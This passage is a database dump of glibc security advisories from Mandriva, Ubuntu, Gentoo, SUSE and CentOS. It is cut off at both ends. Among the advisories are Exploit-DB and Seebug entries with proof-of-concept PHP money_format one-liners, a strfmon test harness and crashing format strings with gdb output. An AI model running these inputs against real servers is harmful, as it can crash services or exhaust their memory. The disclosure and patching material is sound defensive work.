_______________________________________________________________________\r\n\r\n Package : glibc\r\n Date : November 25, 2011\r\n Affected: 2010.1, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was discovered and fixed in glibc:\r\n \r\n Multiple untrusted search path vulnerabilities in elf/dl-object.c in\r\n certain modified versions of the GNU C Library (aka glibc or libc6),\r\n including glibc-2.5-49.el5_5.6 and glibc-2.12-1.7.el6_0.3 in Red Hat\r\n Enterprise Linux, allow local users to gain privileges via a crafted\r\n dynamic shared object (DSO) in a subdirectory of the current working\r\n directory during execution of a (1) setuid or (2) setgid program that\r\n has in (a) RPATH or (b) RUNPATH. NOTE: this issue exists because\r\n of an incorrect fix for CVE-2010-3847 (CVE-2011-0536).\r\n \r\n The GNU C Library (aka glibc or libc6) before 2.12.2 and Embedded GLIBC\r\n (EGLIBC) allow context-dependent attackers to execute arbitrary code\r\n or cause a denial of service (memory consumption) via a long UTF8\r\n string that is used in an fnmatch call, aka a stack extension attack,\r\n a related issue to CVE-2010-2898, as originally reported for use of\r\n this library by Google Chrome (CVE-2011-1071).\r\n \r\n The addmntent function in the GNU C Library (aka glibc or libc6) 2.13\r\n and earlier does not report an error status for failed attempts to\r\n write to the /etc/mtab file, which makes it easier for local users\r\n to trigger corruption of this file, as demonstrated by writes from\r\n a process with a small RLIMIT_FSIZE value, a different vulnerability\r\n than CVE-2010-0296 (CVE-2011-1089).\r\n \r\n locale/programs/locale.c in locale in the GNU C Library (aka glibc\r\n or libc6) before 2.13 does not quote its output, which might allow\r\n local users to gain privileges via a crafted localization environment\r\n variable, in conjunction with a program that executes a script that\r\n uses the eval function (CVE-2011-1095).\r\n \r\n Integer overflow in posix/fnmatch.c in the GNU C Library (aka glibc or\r\n libc6) 2.13 and earlier allows context-dependent attackers to cause a\r\n denial of service (application crash) via a long UTF8 string that is\r\n used in an fnmatch call with a crafted pattern argument, a different\r\n vulnerability than CVE-2011-1071 (CVE-2011-1659).\r\n \r\n crypt_blowfish before 1.1, as used in glibc on certain platforms,\r\n does not properly handle 8-bit characters, which makes it easier\r\n for context-dependent attackers to determine a cleartext password by\r\n leveraging knowledge of a password hash (CVE-2011-2483).\r\n \r\n The updated packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0536\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1071\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1089\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1095\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1659\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2010.1:\r\n 4af7f6efb12c5be3ad435a6d9865be57 2010.1/i586/glibc-2.11.1-8.3mnb2.i586.rpm\r\n 82f97e43fc7ab7ee2fbfc92d9ed844f0 2010.1/i586/glibc-devel-2.11.1-8.3mnb2.i586.rpm\r\n 013f4da3b270a6860e9ae171b456a488 2010.1/i586/glibc-doc-2.11.1-8.3mnb2.i586.rpm\r\n 65da2025a253885a3a3e0699eb407a61 2010.1/i586/glibc-doc-pdf-2.11.1-8.3mnb2.i586.rpm\r\n e5b6f256bad2b8afa7674e2f4d3c80bc 2010.1/i586/glibc-i18ndata-2.11.1-8.3mnb2.i586.rpm\r\n 319ecf5d08bc0e0aab9b0cf3e5cf6a6e 2010.1/i586/glibc-profile-2.11.1-8.3mnb2.i586.rpm\r\n 99c144bfc7581d9f3b885c7a630c89ce 2010.1/i586/glibc-static-devel-2.11.1-8.3mnb2.i586.rpm\r\n 966e023400d62e841942b69bae4d06de 2010.1/i586/glibc-utils-2.11.1-8.3mnb2.i586.rpm\r\n 577f1f88b14add8ea8753b17d730cb8a 2010.1/i586/nscd-2.11.1-8.3mnb2.i586.rpm \r\n 2e1bffb07071cb21ef6363c21588f4b7 2010.1/SRPMS/glibc-2.11.1-8.3mnb2.src.rpm\r\n\r\n Mandriva Linux 2010.1/X86_64:\r\n 05e4da86aea47726b27c00e3f26e3445 2010.1/x86_64/glibc-2.11.1-8.3mnb2.x86_64.rpm\r\n d3689fe0a7ae8e4c0e309b34c82cabfd 2010.1/x86_64/glibc-devel-2.11.1-8.3mnb2.x86_64.rpm\r\n b8be4de2a9c6a8e3effe06234429a227 2010.1/x86_64/glibc-doc-2.11.1-8.3mnb2.x86_64.rpm\r\n 1ac19950a67c4ee965b0ae9d2d6a0396 2010.1/x86_64/glibc-doc-pdf-2.11.1-8.3mnb2.x86_64.rpm\r\n 54031c917cb54a5abc42ebaf30dfe894 2010.1/x86_64/glibc-i18ndata-2.11.1-8.3mnb2.x86_64.rpm\r\n 18c2a1354df2094a7508b1990420ab5b 2010.1/x86_64/glibc-profile-2.11.1-8.3mnb2.x86_64.rpm\r\n f8cef0d317c3ccbb5446672a1cf00ad6 2010.1/x86_64/glibc-static-devel-2.11.1-8.3mnb2.x86_64.rpm\r\n 78b27e0739627abebc7c43fbf82e107b 2010.1/x86_64/glibc-utils-2.11.1-8.3mnb2.x86_64.rpm\r\n e37194682e8ef10c21a8d8483e76b3f4 2010.1/x86_64/nscd-2.11.1-8.3mnb2.x86_64.rpm \r\n 2e1bffb07071cb21ef6363c21588f4b7 2010.1/SRPMS/glibc-2.11.1-8.3mnb2.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 73cffaaa03648c9eb01ed50b5fdd0cee mes5/i586/glibc-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 5e9ec7d6e3f319b5076dd51506d47032 mes5/i586/glibc-devel-2.8-1.20080520.5.8mnb2.i586.rpm\r\n c80b37f1a750968735f8ce51c920e84e mes5/i586/glibc-doc-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 7de1f541c2bf6e17a4f3007cad517140 mes5/i586/glibc-doc-pdf-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 27a365665846989b629b0cb3fb15acfd mes5/i586/glibc-i18ndata-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 3f2f68a0bc47bace3586919671c7f1b4 mes5/i586/glibc-profile-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 17019cf79cf3864c537e12aefd48a23d mes5/i586/glibc-static-devel-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 7ad8f634ee4e0c5fc0f340dcfebcf0fb mes5/i586/glibc-utils-2.8-1.20080520.5.8mnb2.i586.rpm\r\n 53a5dc175995723322a13a7e3bbd6c41 mes5/i586/nscd-2.8-1.20080520.5.8mnb2.i586.rpm \r\n 6fcd77d9eac9fa71f91dcb1218afd628 mes5/SRPMS/glibc-2.8-1.20080520.5.8mnb2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 33f73ece95aa39c59e0370449f13d3af mes5/x86_64/glibc-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 626f8e4774270e50c5e9bf2bc7dfa64c mes5/x86_64/glibc-devel-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n c9d59258ac0fc0463c585405bb46327a mes5/x86_64/glibc-doc-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n f81b494a1d394c48921c99983288c538 mes5/x86_64/glibc-doc-pdf-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 1c972a49ecbfc91d0a156dd743894c14 mes5/x86_64/glibc-i18ndata-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 45aa431a8a9920d188698ae64fe5466d mes5/x86_64/glibc-profile-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n ecf5dca4c8bc49c1e3ebeb2a698b38a3 mes5/x86_64/glibc-static-devel-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 8de7d2dfa8ea598aac75faf24f606f13 mes5/x86_64/glibc-utils-2.8-1.20080520.5.8mnb2.x86_64.rpm\r\n 7615c6e96903c8c146d5ae2d2912c6ee mes5/x86_64/nscd-2.8-1.20080520.5.8mnb2.x86_64.rpm \r\n 6fcd77d9eac9fa71f91dcb1218afd628 mes5/SRPMS/glibc-2.8-1.20080520.5.8mnb2.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niD8DBQFOz9t8mqjQ0CJFipgRApgMAKDCqECazAj1XIHHxrkgU20PDJYFkgCgwVPy\r\nTvvKkY3VN0Zc9M0LYEgkNUg=\r\n=P3KM\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-12-04T00:00:00", "published": "2011-12-04T00:00:00", "id": "SECURITYVULNS:DOC:27395", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27395", "title": "[ MDVSA-2011:178 ] glibc", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1396-1\r\nMarch 09, 2012\r\n\r\neglibc, glibc vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nMultiple vulnerabilities were discovered and fixed in the GNU C Library.\r\n\r\nSoftware Description:\r\n- eglibc: Embedded GNU C Library: sources\r\n- glibc: GNU C Library: Documentation\r\n\r\nDetails:\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\ninteger overflows in the timezone handling code. An attacker could use\r\nthis to possibly execute arbitrary code by convincing an application\r\nto load a maliciously constructed tzfile. (CVE-2009-5029)\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\npasswd.adjunct.byname map entries in the Network Information Service\r\n(NIS) code in the name service caching daemon (nscd). An attacker\r\ncould use this to obtain the encrypted passwords of NIS accounts.\r\nThis issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\r\n\r\nChris Evans reported that the GNU C Library did not properly\r\ncalculate the amount of memory to allocate in the fnmatch() code. An\r\nattacker could use this to cause a denial of service or possibly\r\nexecute arbitrary code via a maliciously crafted UTF-8 string.\r\nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1071)\r\n\r\nTomas Hoger reported that an additional integer overflow was possible\r\nin the GNU C Library fnmatch() code. An attacker could use this to\r\ncause a denial of service via a maliciously crafted UTF-8 string. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\r\nand Ubuntu 11.04. (CVE-2011-1659)\r\n\r\nDan Rosenberg discovered that the addmntent() function in the GNU C\r\nLibrary did not report an error status for failed attempts to write to\r\nthe /etc/mtab file. This could allow an attacker to corrupt /etc/mtab,\r\npossibly causing a denial of service or otherwise manipulate mount\r\noptions. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS,\r\nUbuntu 10.10 and Ubuntu 11.04. (CVE-2011-1089)\r\n\r\nHarald van Dijk discovered that the locale program included with the\r\nGNU C library did not properly quote its output. This could allow a\r\nlocal attacker to possibly execute arbitrary code using a crafted\r\nlocalization string that was evaluated in a shell script. This\r\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1095)\r\n\r\nIt was discovered that the GNU C library loader expanded the\r\n$ORIGIN dynamic string token when RPATH is composed entirely of this\r\ntoken. This could allow an attacker to gain privilege via a setuid\r\nprogram that had this RPATH value. (CVE-2011-1658)\r\n\r\nIt was discovered that the GNU C library implementation of memcpy\r\noptimized for Supplemental Streaming SIMD Extensions 3 (SSSE3)\r\ncontained a possible integer overflow. An attacker could use this to\r\ncause a denial of service or possibly execute arbitrary code. This\r\nissue only affected Ubuntu 10.04 LTS. (CVE-2011-2702)\r\n\r\nJohn Zimmerman discovered that the Remote Procedure Call (RPC)\r\nimplementation in the GNU C Library did not properly handle large\r\nnumbers of connections. This could allow a remote attacker to cause\r\na denial of service. (CVE-2011-4609)\r\n\r\nIt was discovered that the GNU C Library vfprintf() implementation\r\ncontained a possible integer overflow in the format string protection\r\ncode offered by FORTIFY_SOURCE. An attacker could use this flaw in\r\nconjunction with a format string vulnerability to bypass the format\r\nstring protection and possibly execute arbitrary code. (CVE-2012-0864)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libc6 2.13-20ubuntu5.1\r\n\r\nUbuntu 11.04:\r\n libc6 2.13-0ubuntu13.1\r\n\r\nUbuntu 10.10:\r\n libc-bin 2.12.1-0ubuntu10.4\r\n libc6 2.12.1-0ubuntu10.4\r\n\r\nUbuntu 10.04 LTS:\r\n libc-bin 2.11.1-0ubuntu7.10\r\n libc6 2.11.1-0ubuntu7.10\r\n\r\nUbuntu 8.04 LTS:\r\n libc6 2.7-10ubuntu8.1\r\n\r\nAfter a standard system update you need to restart all services or\r\nreboot your computer to make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1396-1\r\n CVE-2009-5029, CVE-2010-0015, CVE-2011-1071, CVE-2011-1089,\r\n CVE-2011-1095, CVE-2011-1658, CVE-2011-1659, CVE-2011-2702,\r\n CVE-2011-4609, CVE-2012-0864\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-20ubuntu5.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.13-0ubuntu13.1\r\n https://launchpad.net/ubuntu/+source/eglibc/2.12.1-0ubuntu10.4\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.10\r\n https://launchpad.net/ubuntu/+source/glibc/2.7-10ubuntu8.1\r\n", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:DOC:27743", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27743", "title": "[USN-1396-1] GNU C Library vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3856", "CVE-2009-4880", "CVE-2010-3847"], "description": "### Background\n\nThe GNU C library is the standard C library used by Gentoo Linux systems. \n\n### Description\n\nMultiple vulnerabilities were found in glibc, amongst others the widely-known recent LD_AUDIT and $ORIGIN issues. For further information please consult the CVE entries referenced below. \n\n### Impact\n\nA local attacker could execute arbitrary code as root, cause a Denial of Service, or gain privileges. Additionally, a user-assisted remote attacker could cause the execution of arbitrary code, and a context-dependent attacker could cause a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll GNU C library users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-libs/glibc-2.11.2-r3\"", "edition": 1, "modified": "2010-11-15T00:00:00", "published": "2010-11-15T00:00:00", "id": "GLSA-201011-01", "href": "https://security.gentoo.org/glsa/201011-01", "type": "gentoo", "title": "GNU C library: Multiple vulnerabilities", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T18:45:49", "description": "GNU glibc 2.x 'strfmon()' Function Integer Overflow Weakness. CVE-2009-4880. Dos exploit for linux platform", "published": "2009-09-17T00:00:00", "type": "exploitdb", "title": "GNU glibc 2.x - 'strfmon' Function Integer Overflow Weakness", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4880"], "modified": "2009-09-17T00:00:00", "id": "EDB-ID:33230", "href": "https://www.exploit-db.com/exploits/33230/", "sourceData": "source: http://www.securityfocus.com/bid/36443/info\r\n\r\nGNU glibc is prone to an integer-overflow weakness.\r\n\r\nAn attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\nGNU glibc 2.10.1 and prior are vulnerable. \r\n\r\nThe following proof-of-concept commands are available:\r\n\r\nphp -r 'money_format(\"%.1073741821i\",1);'\r\nphp -r 'money_format(\"%.1343741821i\",1);' ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33230/"}, {"lastseen": "2016-02-03T14:55:56", "description": "Multiple BSD Platforms 'strfmon()' Function Integer Overflow Weakness. CVE-2008-1391. Dos exploit for bsd platform", "published": "2008-03-27T00:00:00", "type": "exploitdb", "title": "Multiple BSD Platforms - 'strfmon' Function Integer Overflow Weakness", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1391"], "modified": "2008-03-27T00:00:00", "id": "EDB-ID:31550", "href": "https://www.exploit-db.com/exploits/31550/", "sourceData": "source: http://www.securityfocus.com/bid/28479/info\r\n\r\nMultiple BSD platforms are prone to an integer-overflow weakness.\r\n\r\nAn attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\nThis issue affects FreeBSD 6, 7 and NetBSD 4; other platforms may also be affected.\r\n\r\n#include <stdio.h>\r\n#include <monetary.h>\r\n\r\nint main(int argc, char* argv[]){\r\nchar buff[51];\r\nchar *bux=buff;\r\nint res;\r\n\r\nres=strfmon(bux, 50, argv[1], \"0\");\r\nreturn 0;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31550/"}], "seebug": [{"lastseen": "2017-11-19T21:47:51", "description": "BUGTRAQ ID: 28479\r\nCVE ID:CVE-2008-1391\r\nCNCVE ID:CNCVE-20081391\r\n\r\n\u591a\u4e2aBSD\u5e73\u53f0'strfmon()'\u51fd\u6570\u5904\u7406\u5b58\u5728\u6574\u6570\u6ea2\u51fa\uff0c\u53ef\u80fd\u4ee5\u53d7\u5f71\u54cd\u5e94\u7528\u7a0b\u5e8f\u4e0a\u4e0b\u6587\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u5931\u8d25\u7684\u5c1d\u8bd5\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\r\n\u95ee\u9898\u4ee3\u7801\u7c7b\u4f3c\u5982\u4e0b\uff1a\r\n#include <monetary.h>\r\nssize_t\r\nstrfmon(char * restrict s, size_t maxsize, const char *\r\nrestrict format,\r\n...);\r\n- --- 1. /usr/src/lib/libc/stdlib/strfmon.c -\u6574\u6570\u6ea2\u51fa\r\n\u4e3b\u8981\u95ee\u9898\u5b58\u5728\u4e8estrfmon()\u51fd\u6570\u4e2d\uff0c\u5f53\u4ee5\u5982\u4e0b\u65b9\u6cd5\u4f7f\u7528\u8fd9\u4e2a\u51fd\u6570\u65f6\uff1a\r\n- ---example-start--\r\n#include <stdio.h>\r\n#include <monetary.h>\r\nint main(int argc, char* argv[]){\r\nchar buff[51];\r\nchar *bux=buff;\r\nint res;\r\nres=strfmon(bux, 50, argv[1], "0");\r\nreturn 0;\r\n}\r\n- ---example-end--\r\n\r\n\u5e76\u7f16\u8bd1\uff0c\u53ef\u64cd\u4f5c\u5982\u4e0b\u683c\u5f0f\u4e32\uff1a\r\ncxib# ./pln %99999999999999999999n\r\nSegmentation fault (core dumped)\r\n\u95ee\u9898\u5982\u4e0b\uff1a\r\ncxib# gdb -q pln\r\n(no debugging symbols found)...(gdb) r %99999999999999999999n\r\nStarting program: /cxib/C/pln %99999999999999999999n\r\n(no debugging symbols found)...(no debugging symbols found)...\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x2814e0e6 in memmove () from /lib/libc.so.7\r\n(gdb)\r\nmemmove()\u4f1a\u91cd\u5206\u914d\u5185\u5b58\u3002\r\ncxib# gdb -q pln\r\n(no debugging symbols found)...(gdb) r %.9999999999n\r\nStarting program: /cxib/C/pln %.9999999999n\r\n(no debugging symbols found)...(no debugging symbols found)...\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x2814f093 in abort () from /lib/libc.so.7\r\n\u4e0b\u4e2a\u4f8b\u5b50\u662f:\r\ncxib# ./pln %#99999999999999999999n\r\nLong execution time. Let's try check this process :\r\n- --------------------------\r\ncxib# ps -aux | grep pln\r\ncxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68\r\n./pln %#99999999999999999999n\r\ncxib# ps -aux | grep pln\r\ncxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07\r\n./pln %#99999999999999999999n\r\n1 VSZ=140320\r\n2 VSZ=482336\r\n- ----------------------------\r\npln\u4f1a\u5206\u914d\u66f4\u591a\u7684\u5185\u5b58\uff0cPHP\u5728money_format()\u51fd\u6570\u4e2d\u4f7f\u7528strfmon()\uff0c\u5f53\u6211\u4eec\u5728Apache\u4e2d\u4f7f\u7528mod_php5\uff0c\u6211\u4eec\u53ef\u4ee5\u5efa\u7acb\u5982\u4e0b\u5229\u7528\u65b9\u6cd5\uff0c\u7ed3\u679c\u5982\u4e0b\uff1a\r\n- ---apache-child-die---\r\nswap_pager: out of swap space\r\nswap_pager_getswapspace(16): failed\r\nMar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was\r\nkilled: out of swap space\r\n- ---apache-child-die---\r\n\r\n\n\nNetBSD NetBSD 4.0\r\nFreeBSD FreeBSD 6.0 .x\r\nFreeBSD FreeBSD 6.0 -STABLE\r\nFreeBSD FreeBSD 6.0 -RELEASE\r\nFreeBSD FreeBSD 7.0 BETA4\r\nFreeBSD FreeBSD 7.0 -RELENG\r\nFreeBSD FreeBSD 7.0 -PRERELEASE\r\nFreeBSD FreeBSD 7.0\r\nFreeBSD FreeBSD 6.0 -RELEASE-p5\n \u53ef\u8054\u7cfb\u4f9b\u5e94\u5546\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\n<a href=http://www.netbsd.org/ target=_blank>http://www.netbsd.org/</a>", "published": "2008-03-29T00:00:00", "title": "\u591a\u4e2aBSD\u5e73\u53f0'strfmon()'\u51fd\u6570\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1391"], "modified": "2008-03-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3103", "id": "SSV:3103", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "suse": [{"lastseen": "2016-09-04T12:03:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2942", "CVE-2010-3078", "CVE-2010-3297", "CVE-2010-0015", "CVE-2010-2955", "CVE-2010-2946", "CVE-2010-0296", "CVE-2010-3310", "CVE-2010-3296", "CVE-2010-0830", "CVE-2010-3015", "CVE-2010-2954", "CVE-2010-3856", "CVE-2010-2803", "CVE-2010-3847", "CVE-2010-2798", "CVE-2008-1391", "CVE-2010-3080"], "description": "The Linux C library glibc was updated to fix critical security issues and several bugs:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-10-28T13:41:00", "published": "2010-10-28T13:41:00", "id": "SUSE-SA:2010:052", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00007.html", "title": "local privilege escalation in glibc", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2019-12-20T18:25:07", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0125\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030465.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-profile\nglibc-utils\nnptl-devel\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0125.html", "edition": 4, "modified": "2012-02-14T02:09:08", "published": "2012-02-14T02:09:08", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030465.html", "id": "CESA-2012:0125", "title": "glibc, nptl, nscd security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0126\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If 